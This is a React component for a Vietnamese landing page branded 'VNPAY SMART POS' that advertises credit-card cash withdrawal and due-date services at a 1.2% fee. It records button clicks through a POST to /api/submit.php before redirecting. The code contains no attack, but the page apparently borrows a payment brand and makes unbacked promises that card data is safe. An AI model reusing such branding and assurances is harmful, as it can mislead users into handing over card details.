import "./Vnpay.css";

function Vnpay() {
  async function sendAction(action, redirectUrl) {
    try {
      await fetch("/api/submit.php", {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ action }),
      });
    } catch (e) {
      console.error("API error:", e);
    } finally {
      // chuyển hướng sang trang khác
      window.location.href = redirectUrl;
    }
  }

  return (
    <div>
      <section className="hero-section">
        <div id="check" className="hero-content">
          <div id="h11">
            <h1 className="py-3" id="html">VNPAY SMART POS</h1>
          </div>
          <h3 className="py-2" id="html2">
            Giải Pháp Rút Tiền Và Đáo Hạn Thẻ Tín Dụng Trực Tuyến Toàn Diện
          </h3>
          <p className="html3">Phí dịch vụ 1,2%</p>

          <div className="d-flex align-content-center gap-1">
            <img style={{width:"20px",height:'30px'}} src="/locked.svg" alt="locked" />
            <p className="loked">Vnpay bảo vệ thông tin thẻ của bạn.</p>
          </div>
          <div className="d-flex align-content-center gap-1">
            <img style={{width:"20px",height:'20px'}} src="/locked.svg" alt="locked" />
            <p className="loked">Thông tin thẻ được bảo mật và không bị xâm phạm.</p>
          </div>

          <div className="node">
            <a
                href="/ruttien"
                className="hero-btn"
                onClick={(e) => { e.preventDefault(); sendAction("rut_tien", "/ruttien"); }}
                >
                Rút Tiền
            </a>
            <a
                href="/daohan"
                className="hero-btn"
                onClick={(e) => { e.preventDefault(); sendAction("dao_han", "/daohan"); }}
                >
                Đáo Hạn
            </a>
          </div>
        </div>
      </section>
    </div>
  );
}
export default Vnpay;